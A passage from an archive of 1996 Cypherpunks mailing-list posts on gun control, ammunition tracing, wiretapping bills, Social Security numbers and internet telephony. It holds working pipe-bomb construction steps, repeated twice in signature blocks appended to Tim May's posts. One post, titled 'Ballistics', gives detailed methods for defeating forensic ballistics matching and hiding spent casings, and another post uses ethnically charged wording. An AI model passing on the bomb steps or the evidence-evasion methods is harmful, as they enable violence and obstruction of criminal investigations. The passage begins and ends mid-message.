punks would understand the principal. Just as they seek out "clean" guns,
they surely would not load their carry guns with 9mm ammo bought and
"registered" under their own names.

2. Target shooters consume the vast majority of rounds. (This is why
foolish proposals by Moynihan to "force" ammo to be sold for, say, $5 a
round, is ineffectual for the intended purpose: the perp loading his .357
or 9mm will hardly be deterred by a $30 price, even assuming he would buy
in a store at these prices.) (Think of the black market supply: my several
thousand rounds of 9mm, .45, .223, etc., would be worth $15,000 or more at
"Moynihan prices. The Feds could try to outlaw all ammo transfers between
individuals...left as an exercise as to how effective this could ever be,
and whether juries would send people off to the pen for the crime of
selling some .45 shells.)

3. Reloaders. As others have noted, there is an essentially inexhaustible
supply of reloaded shells.

4. The vast amound of ammo already out there. Crates and crates and crates
of surplus ammo in all sorts of calibers, entire container ships of ammo
coming to the U.S. (e.g, I just got my UPS delivery of 850 rounds of a
Czech brand, Sellior and Bellot, and my 1000 rounds of Italian Fiocchi are
due any day...multiply this by 100,000.

5. Stockpiling. Don't forget the "law of unintended consequences." The
biggest gun boom in history came when the Feds cracked down on gun
purchases. California gun stores were crowded for months. (Ditto for
high-capacity magazines: in the months of "warning" that people had,
factories cranked up production, customers stockpiled, and there was a
sudden surge of interest in getting that previously-obscure 3-round mag for
one's Glocks! :-})

>utterly useless to do so.  The second problem is the number of shells
>expelled in the US every day.  I doubt there's enough room on the
>butt end of a shell to print that number (it couldn't be printed on
>the sides, as this would screw up the fit of the shell, and possibly
>weaken it).  And, it'd be almost impossible getting gun manufacturers to

6. There isn't enough room. The shell I have in my hand barely has enough
room to print "FEDERAL 45 AUTO". A unique numbering of the total ammo
sales, even by boxes and not individual cases, would need a 9-12 characters
(and would likely run out in a few year--12-14 characters would be needed).
Actually, this is the "most solvable" of the problems...the others are the
real killers.

>pay for the equiptment that it would take to emprint serial numbers.
>The third number is that cartridges


>are recycled.  Aside from reloading your own, there's a large number
>of people that sweep up brass from gun ranges to reload themselves.

>The idea that someone swept up the brass could get almost anyone off.

7. There's this...and there's the possibility that one could implicate
_others_. For example, pick up a few empty shells at the range. I imagine
there might be some souvenir value in buying a "This shell was fired by
Dianne Feinstein." (For the uniniated, at the same time DiFi was railing
against the public's ownership of guns, she was carrying one in her purse.)

This gets back to the "chain of evidence" point we so often mention.

>The final problem is the paperwork.  Cops today can barly keep up
>with the paperwork involved with the Brady Bill.  Could you imagine
>if they had to keep track of AMMO purchases?

8. Indeed, it would inflate ammo prices too much.

(Given that people like me have thousands of rounds, the ability to reload,
and would be happy to undercut the local K-Mart's price.)

>The NRA, I'm sorry to say, has screwed up royally.  It's about time
>that they regroup, or else they fall.
>

Indeed, I refused to renew my membership because of their wishy-washyness
on basic issues. In my opinion, spending the "Life Member" fees on a Dillon
reloading press is a better investment.


--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 11:36:30 +0800
To: cypherpunks@toad.com
Subject: United States as Northern Ireland
Message-ID: <ae2be7b705021004087b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 PM 8/5/96, hallam@Etna.ai.mit.edu wrote:

>If you think the wiretap bill is bad think on this, all guns
>of all types banned except where held by special license.
>Checkpoints at major road intersections. Stop and search
>patrols in city centers and the army on the street. Its not
>at all far fetched, the UKgovt took less than a year to
>introduce such measures in Northern Ireland. Constitution or
>not, don't expect that the US Congress won't make a similar
>response.

Yes, I agree.

Welcome to our side, Phill!

--Tim May

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Tue, 6 Aug 1996 10:10:08 +0800
To: Zero Cool <cypherpunks@toad.com
Subject: Off topic: Re: viruss'
Message-ID: <2.2.32.19960805231721.006d4cb8@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:38 AM 8/5/96 -0700, you wrote:
>Does anyone know where thre is  good virus page????
>I know that there is one out there, but dont have the add.
>Zero Cool

Let your mouse do the walking.
http://www.yahoo.com
Type "virus", without the quotes.
viola!

Good luck!
Vagab0nd<br>
<a href="http://ww2.sd.cybernex.net/~vagab0nd/index.html">Visit web page for
public key.</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 6 Aug 1996 11:46:08 +0800
To: cypherpunks@toad.com
Subject: "lite" version of cpunks available?
Message-ID: <Pine.BSF.3.91.960805181131.186A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Are there any filtered versions of the Cypherpunks mailing list available? 
I'm currently subscribed to cypherpunks-d@gateway.com, but that machine is
down and I haven't received anything in the past few days. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 6 Aug 1996 11:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <199608042250.PAA13719@toad.com>
Message-ID: <4u6733$30p@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199608042250.PAA13719@toad.com>,
Bill Stewart  <stewarts@ix.netcom.com> wrote:
>According to Alaska Airlines, the FAA's policy as of last week
>has switched to a mandatory policy that if you don't produce
>government-issued photo-id, you can't get on the plane;
>the previous policy had been more flexible.  

So does anyone have any sort of "official" list as to what constitutes
"government-issued photo-id"?  I'll be flying within California soon
(see you at Crypto...), as as a "furriner", I have no US ID.  I do have
photo-id issued by _another_ government, though (a health card; I wonder
if they'll have heard of that...).

   - Ian "I'd try to be sure to get to the airport early, but the plane
            leaves at some ridiculous time like 7:30am"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgafi0ZRiTErSPb1AQFsOQQAmxihUufsUh5EYbJ1aHrnP0zFomUb/uo9
qAScGSlWAzzpXYuXnZaG29VeSJ60b/haXaIbSR8C1X4oEIUjiv69gzYa/YJS7RTr
Vb4JEKZdJyiDPxZ7rlyVBquWGLBItazw4mkPAzFi4r6f0nnlXifq1zWGtTR7qakZ
1nGEEYfBeQE=
=h/Zx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 6 Aug 1996 11:58:43 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports)
Message-ID: <v02120d40ae2c47b357a4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:13 8/5/96, Mike Duvos wrote:
>Jamie Zawinski wrote:
>
>> If you already have a SSN, can you get a *new* one in any legal way?
>> (Sort of the same idea as changing your phone number to avoid
>> telemarketing scum...)

To prevent the blacklisting of labor leaders by SSN, the Social Security
Act has a provision that allows you to request a new SSN. You have a right
to get a new SSN issued. Don't expect your SS office to know anything about
it.

[disclaimer: I am not an attorney]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Tue, 6 Aug 1996 12:34:21 +0800
To: cypherpunks@toad.com
Subject: NYtimes on " 'net telphony"
Message-ID: <199608052330.SAA06495@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


An article I found on Internet Telephony today in the New 
York Times.  

reference:
<http://www.nytimes.com/library/cyber/week/0805telephony.html>

article also contained a diagram of a traditional Point-to-point 
synchronous phone call and a packet-switched Internet call which 
shoed pieces of a sentence being transferred over multiple routes.

"         _ Free Long Distance
              Phone Calls! (Computer Extra)_

          By PETER H. LEWIS 

               Sometimes Internet technology moves faster than the
               speed of sound. 

          Nearly 400 Intel Corp. engineers were waiting for Brian
          Frank to stage a demonstration of Internet telephones last
          week at a business meeting in Oregon, when suddenly his
          laptop computer started ringing. 

          Frank, a summer intern, had just finished loading new
          software that would let him place a phone call from his
          laptop to an associate's PC backstage. But before he could
          make the call, someone in Norway had seen Frank's network
          connection pop up on an Internet phone directory on the
          World Wide Web and dialed him up. "

[..snip..]

        
"        For the Intel engineers, it was an industry wake-up call.
          Hitherto a hacker's hobby, the use of microphones and
          computers to place phone calls, send faxes and transmit
          pager signals over the Internet now seems ready to emerge as
          a serious business opportunity. "

[..snip..]

"        Technical drawbacks still keep Internet telephony from being
          a true substitute for the good old, reliable telephone
          network. And yet, the number of regular Internet telephone
          users is expected to rise from fewer than 400,000 last year
          to 16 million by 1999, according to a forecast from the
          research company International Data Corp. By that year, IDC
          predicts, Internet telephony could constitute a $500 million
          market. 

          Beyond cheap phone calls, the possible applications include:
          

          -- Catalogue shopping on the World Wide Web, where the
          customer could speak live with a sales agent. 

          -- Work-team software that would enable groups working
          collaboratively on documents via the Internet to converse
          about the project, too. 

          -- Adding voice capabilities to multiplayer computer games
          like "Doom" or "Quake," so that teammates could coach one
          another and jeer the opposition. "

[..snip..]
  
"         In fact, Intel and Microsoft late last month jointly
          announced a set of technical standards that are intended to
          promote compatibility among various makes of hardware and
          software used in Internet telephony. "

[..snip..]

"         "A lot of people look at Internet telephony as a replacement
          or alternative for long-distance service, and that's the
          most obvious use for it today," said Frederic H. Yeomans,
          marketing manager for Intel's Internet and communications
          group in Hillsboro, Ore. But Yeomans said the technology was
          advancing so quickly that new applications, possibly ones
          not yet imagined, would inevitably arise. "
(hype?  You make the call..)

[..snip..]

"        Telephone companies appear to be divided over how to respond
          to the technological challenges. 

          "Everyone would agree it's a compelling, alternative form of
          communication, and we're excited about it," said Mark
          Fisher, vice president for Pacific Bell Internet Services in
          San Francisco, a unit of the regional Bell holding company
          Pacific Telesis. "

[..snip..]

"         Other, smaller phone companies are not as optimistic, and
          are mounting a legal and lobbying challenge to try to halt
          competition from the computer industry. "

[..snip..]
          NYT-08-04-96 1932EDT 
         Copyright 1996 The New York Times Company 

...

What follows is more hype about a "killer app" that will bring this 
technology to the forefront. 

Little is said about current bandwitdth limitations or PC 
technology limitations.  Nothing is said of crypto technology either.

me
--------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
send a message with the text "get key" in the "Subject:"
field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 12:12:53 +0800
To: cypherpunks@toad.com
Subject: Re: Public report of the EU crack.
Message-ID: <ae2bef6106021004d576@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 8/6/96, John C. Randolph wrote:
>Well, well, well!
>
>So we gain a several allies in our battle against key-escrow, and
>lo and behold, it's all the *other* governments who don't want
>Uncle Sam to read their mail.
>
>I hope that any c'punks in foreign countries can make some politcal
>hay with this: "Don't let the yankee imperialists tell us a goddamn thing
>about crypto policy!  They'll only use it to pull weasel moves in the
>trade talks!"
>
>Actually, it might be a good thing for Her Majesty's government to
>issue an advisory, saying not to buy US routers and encryption software,
>because it can't be trusted, under present US ITAR rules.

Agreed. The report was only surpising to me in that it appeared in
print...anyone who read Bamford in '82 knew this sort of economic espionage
was a major mission of the NSA and various private contractors.

On the subject of routers and sniffers, excuse me if I'm misremembering
things, but wasn't a certain anti-Mitnick hacker writing in one of his
books about his role in developing certain "packet sniffers" that had
properties desirable to the U.S. intelligence community? Perhaps the Brits
are just being "monitored" by the Colonials?

(If I sound paranoid, I just came from a showing of "Chain Reaction." Some
flaws, but also some good reminders about the dangers of the "black
budget," large listening posts in Virgina (and England and elsewhere), and
a U.S. government that now sits astride the world.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 6 Aug 1996 00:39:17 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?" [NOISE]
Message-ID: <1.5.4.32.19960805124248.002f27d4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 13:50 04/08/96 -0700, Bill Stewart wrote:
>>restrictions, but these shall only be such as are provided by law
>>and are necessary:
>>(a) For respect of the rights or reputations of others;
>>(b) For the protection of national security or of 
>>public order (ordre public), or of public health or morals. 
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^        ^^^^^^           ^^^^^^^
>
>Lots of UN declarations of rights have this sort of exception;
>"protection of public morals" is something so blatantly vague
>and broad that if a government contends that such a concept exists, 
>as the covenant does, it could probably force the World Court
>to conclude that it permits them to declare as "necessary"
>just about anything short of burning witches and heretics,
>and humanely beheading heretics, drug dealers, and anonymous remailer
>operators is probably ok by this standard.

Heretics it depends, drug dealers no problem, but anonymous
remailer operators haven't been beheaded yet. Their persecution
will probably take much more subtle forms -- denial of government
jobs or contracts (lawbreakers and anarchists, after all),
whatever hurts most. There are many ways of manipulation in an
advanced, information based society that are no less cruel than
the torture of more overtly authoritarian ones.

International covenants aren't entirely useless: governments have
to report to the UN how much success they are having in
implementation, and are questioned closely. If indeed the fears
of many of you come true, cypherpunks will have far greater
awareness of human rights instruments and their usefulness (or
lack thereof) before the century is done.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 6 Aug 1996 02:17:09 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <1.5.4.32.19960805124321.003064b0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 04/08/96 -0400, Robert Hettinga wrote:
>At 2:06 AM -0400 8/4/96, anonymous-remailer@shell.portal.com wrote:
>> As long as they are doing any kind of usage-based
>> charging, that actual act of charging will continue to cost
>> considerably more than the data transmission.
>
>Ah. So, why settle the transactions for digital cash and skip all that
>overhead? Yet another application for micromoney.

True, though even better would be simply to charge you a flat
rate. If billing is that expensive, why bother? 

What happened to the proposals asking for flat-rate pricing before the FCC?

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 6 Aug 1996 08:28:16 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK YOU, SHITOPUNKS
In-Reply-To: <199608051211.GAA26432@zifi.genetics.utah.edu>
Message-ID: <Pine.LNX.3.94.960805185051.142A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 5 Aug 1996, Anonymous wrote:

> Date: Mon, 5 Aug 1996 06:11:56 -0600
> From: Anonymous <nobody@zifi.genetics.utah.edu>
> To: cypherpunks@toad.com
> Subject: FUCK YOU, SHITOPUNKS
> 
> FUCK YOU, SHITOPUNKS
> DAVID STERNLIGHT
> 

Whoever did this obviously lacks imagination, creativity, and brains.  Not
only would David not use such undescriptive phrases, but he would (and has
said so) not use a remailer.  Whoever did this, you are a true idiot.

 --Deviant
        "Uncle Cosmo ... why do they call this a word processor?"
        "It's simple, Skyler ... you've seen what food processors do to food,
	right?"
                -- MacNelley, "Shoe"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgZDIzAJap8fyDMVAQFpZQf/Vh9A5bI6EABRkOn+izlflDSQO97FSc5T
PSddf/oH/a6biQeFsS+YLIZ/U9ZSxPUB3T0mquZe0YEtowa5FWNmfgKT40ERBHBf
n3fQrI1auBKuZ6W5TJz69qJLHUJj2ngbKqwQ49Ey3urnl4cAJqGCsvSI3qJyadmM
P6A44jHyc0YI83tOGgjTRzxbjXMGk5nmSkFfTQnDGnhpZNI7t0C5+cJ/iJ002YfS
zcTw2UbOx3jq5WLIqjFN2DZBgZy275xP0hZWQFanY4H4E90pmVKqPkW3ZQVdXysO
1fvB0hfreezH6Uc/jvDq4Zszv/m+bsAXPXDdj9EOclW0b7Pf00vEUg==
=Dn7o
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Tue, 6 Aug 1996 10:38:02 +0800
To: cypherpunks@toad.com
Subject: NYtimes OPed pro-wiretapping 8/2
Message-ID: <199608052354.SAA06636@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


found this today as well.  One negative reply letter was also posted.

reference:
<http://www.nytimes.com/yr/mo/day/early/02heym.html>


"August 2, 1996


          Listening in on Terrorism

          By PHILIP HEYMANN

          CAMBRIDGE, Mass. -- President Clinton's major proposals
          for new powers to fight terrorism are useful and pose
          no threat to Americans' civil liberties. "

( oooookkaaay...)

"         Many of these measures are intended only to give government
          as much power to thwart terrorism as it already has to
          combat other criminal acts."

(do go on...I'm fascinated now)


"         The part of the plan that has drawn the most criticism from
          across the political spectrum involves proposals to increase
          the Government's investigative powers, particularly through
          wiretapping and other methods of monitoring phone calls. "

[..snip..]
(assertion follows that current laws are inadequate for electronic 
surveillance against terrorism.)


"        In criminal cases the courts have never considered the use
          of devices that record the numbers of incoming or outgoing
          calls on a telephone to be significant invasions of privacy."

(Never mind what the "people" might say)

"         But there is no similar provision for investigations of
          suspected foreign terrorists. Under the President's
          proposal, agents would be allowed to use the devices if they
          can show that it is relevant to a terrorism investigation."

(not exactly sure how a terrorist investigation differs from a 
criminal investigation...but this is the distinction Heyman is 
drawing.  In his view, current law is not sufficient against domestic 
terrorist investigation.) 

"        Under current law, officials must get a separate warrant for
          each phone the suspect uses unless they can prove the
          suspect is changing phones purposely to thwart
          investigation. This is a stricter standard than is applied
          even to requests to plant a microphone to overhear a 
          suspect."

[..snip..]


"        Government agents would still be required to
          show probable cause that the suspect is committing one of
          the offenses on the Federal list and that the calls being
          monitored will concern that crime. "

(Gosh!  Who knew the government and the FBI were so powerless?)


"        Philip Heymann, a former Deputy Attorney General in the
          Clinton Administration, is a professor at Harvard Law School
          and the Kennedy School of Government. 

                      Copyright 1996 The New York Times Company "

(big shock, eh?)
...
To say that Mr. Heymann is being misleading is an understatement.  He 
ignores that the government wishes to be able to wiretap for 48 hours 
without prior court approval.  He attempts to imply that the roving 
wiretap is focused on an individual rather than a location or 
locations.  And he seems to believe that all of these enormous powers 
will not be abused.

I wonder if he would feel differently if his personal FBI file was 
among those gathered by the Clinton administration.

me
--------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
send a message with the text "get key" in the "Subject:"
field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 13:12:06 +0800
To: cypherpunks@toad.com
Subject: Internal Passports
Message-ID: <ae2bfb9809021004b448@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:01 AM 8/6/96, Duncan Frissell wrote:

>The SS resists issuing new numbers in spite of widespread duplication and
>theft.  Soon people will find themselves denied the right to work in this
>country unless the SS reverses this reluctance.  If your SS# is stolen and
>used "too many times"  in a future worker verification program, you're
>screwed.  And there won't even be any welfare for you.
>
>Use Alta Vista to find the SS Number FAQ.  There's more stuff.

BTW, I attempted to comply with the law in a recent request posted to
ba.jobs.offered and scruz.general: I solicited workers for some brush
clearing on my place, but advised them to only apply if--appearing to be
Hispanic, Latin, Mexican, or otherwise unOfficial--they provided proof of
their legal ability to work for me.

Personally, I don't care. In fact, when employing gardeners and yard works
I prefer Mexicans. But the law says, these days, that I must verify the
legality of workers *if* they appear to be dark-skinned, Mexican, Latin, or
the like. I say "if" because there are no requirements in general for
white-skinned, Anglo workers....no work permits, no proofs of citizenship
(such a document is currently lacking in the American pantheon...I, a mixed
descendant of Mayflower colonist and Scandinavian immigrants, lack such
"proof").

Predictably, I got e-mail threatening me with legal action (ha!) and
claiming me to be a racist.

I promise not to ask my potential employees for legal proof of their right
to work if the Feds and Sacramentans promise not to make it a law that I
check such things, and if the laws are not written such that I am a felon
for not asking for such documents from a dark, dusky Mexican but not from a
blonde- or red-haired ubermensch. (Jews I haven't figured out...some seem
to pass the "no documents required test" and some I want to demand Green
Cards for...ironically, it may be "discrimination" for me to request that
these "dusky" folks supply proof of their permission to work in these
Beknighted States. A strange world we live in.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Tue, 6 Aug 1996 13:41:54 +0800
To: cypherpunks@toad.com
Subject: Ballistics
Message-ID: <199608060242.TAA06198@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 04 Aug 96, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:

>Is there truth to the rumor that poking a file inside the barrel will
>alter the marks on future test firings?

A much better idea is to clean the barrel with a stiff wire brush. If you blue 
the inside of the barrel, and then brush the bluing off, that is enough. 
Alternatively/additionally, fire several hundred rounds with the weapon.  Either 
will change the microscopic pattern of grooves sufficiently to cause a mismatch. 
Poking a file around in the barrel is a good way to ruin a gun.

Changing barrels is a good idea as well. I can change the barrel on my Desert 
Eagle in about 15 seconds. A better idea yet is to fabricate a removable 
silencer (that can be attached/detached without modifying the barrel) with a 
wire brush surrounding the muzzle opening (similar to a batery terminal cleaner, 
but sturdier, of course) so that the bristles put their own marks on the bullet 
as it leaves the barrel. Even if the silencer is found, you will never be able 
to put it on aligned exactly the same way, and the marks will not line up 
exactly. Alternatively, you could mount the bristles on a bearing so they can 
rotate freely, so the patterns of marks constantly change as the brush rotates. 
Of course, getting caught with a silencer is a good way to go directly to jail 
without passing GO.

Of course, if you are serious about avoiding this kind of hassle, you will mount 
a bag to the receiver of your gun to catch the fired shells, so that they aren't 
lying around for curious people to find.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Tue, 6 Aug 1996 15:23:11 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608052116.AA09050@Etna.ai.mit.edu>
Message-ID: <199608060242.TAA18997@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 05 Aug 96, hallam@Etna.ai.mit.edu wrote:
>The shells are removed sometime or other. Nothing is a 100% solution
>but anything that gives the criminal an extra thing to worry about 
>improves the chances that a mistake is made.
>
>Many people go to jail because of fingerprints on shell cases.

If the shell cases are NOT left at the crime scene, there is NO link between 
them and the crime. You are suffering from cranio-rectal inversion.

>I doubt that more than 32 bits of info will be required. Thats not 
>that difficult to imprint.
[snip]
>Not a problem, that type of machinery is a standard type of 
>industrial machine. Might be expensive to adapt the lines but 
>I doubt it.

That doesn't address the fact that (1) there are billions of unstamped shell 
casing extant, (2) stamping the side of a case will weaken it and be a 
significant safety hazard, (3) stamps in the head of the case can be 
filed/scraped off, (4) cases not left at the crime scene have no value as 
evidence, regardless of any serial stamps, extractor marks, etc. Even if you can 
prove a shell was fired in a particular gun, if there is no link between that 
gun and the crime, the "evidence" is worthless. You are suffering from 
cranio-rectal inversion.

>Not an issue. A person may have an excuse that explains why
>the blood is in his car or his fingerprints are on the knife but
>a conviction depends on more than one piece of evidence. If 
>there is information that gives the police a lead it is 
>usefull.

See above. You are suffering from cranio-rectal inversion.

>At present the police are investigating the purchase of white 
>powder - checking each purchaser out who fits the Olympic
>bomber profile. That is a lot of work for a much weaker lead.

That's BLACK powder, stupid! Also, profiling a bomber requires more than one 
crime. A profile is a psychological analysis of the patterns in a criminal's 
handiwork, and patterns cannot be clearly deliniated with a single crime.

>If a person says that they fired at a range then you have 
>narrowed the search scope to the guys at the range.

Huh? Smoke another one, Beavis!

>Not a problem, thats an opportunity. I build very large, very
>high reliability computer systems. I can build machines that
>deal with several million transactions a day for less than a 
>million and run them for less than a quarter million a year. That
>is cheap when one considers the cost of investigation saved.

Yeah, and lets make it mandatory for everyone to accept subcutaneous transponder 
implants monitored by your system. Can anyone say BIG Brother? Regardless of the 
system, some poor schmuck (or an army of them) is going to have to do the data 
entry work for your computer, or it is worthless. Remember the GIGO concept?

>Making that argument defeats your case. Irespective of the framers
>of the constitution nobody in Congress or the Administration believes
>that you have a right to take up arms against the government. In
>fact they are scared of the militia movement and the NRA. Every time
>you make that argument you make it harder for people to accept your
>case. 

The fact that the current government despises the intent of the people who wrote 
the Constitution and tries to circumvent and negate it to the maximum extent 
possible is the root of much of the disillusionment with and distrust of 
government in America today.

>Its like hearing a Marxist spout stuff from Capital to support a
>civil liberties. Regardless of wether the content makes sense the
>form of the argument is a complete turn off. 
>
>I used to side with HCI before I started talking to the 
>talk.politics.guns people. That convinced me that they were a threat
>to the security of the country - even before McVeigh sent me a
>mail defending his 2nd ammendment rights that looked very 
>much like yours. Regardless of whether he is guilty or not I
>still regard him and those that hold his views to be as 
>serious a threat to the USA as the Red Army Faction were in
>Germany, or the Red Brigades in Italy or the IRA in the UK.

Ted Kennedy's car has killed more people than Tim McVeigh's guns.

>If people carelessly justify terrorism they are fueling that
>fire. Up until now the US has not had a serious terrorist 
>problem. If terrorism becomes widespread then don't imagine
>the constitution will be a protection. Thomas and Reinquist 
>are not going to stop measures to "protect the nation" even
>if like the WWII internement of Japaneese nationals they are in
>gross violation of the constitution. 
>
>If you think the wiretap bill is bad think on this, all guns
>of all types banned except where held by special license.
>Checkpoints at major road intersections. Stop and search
>patrols in city centers and the army on the street. Its not
>at all far fetched, the UKgovt took less than a year to 
>introduce such measures in Northern Ireland. Constitution or
>not, don't expect that the US Congress won't make a similar 
>response.

See my sigfile. These are shining examples illustrating why an armed populace is 
critical to freedom, even if some people do misuse firearms. I would rather be 
armed and take my chances against a crackhead looking for someone to mug than be 
disarmed and take my chances against government thugs who have discovered that 
they can act against the populace with impunity.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 13:11:12 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <ae2bffef0a021004b92e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:28 AM 8/6/96, Ian Goldberg wrote:
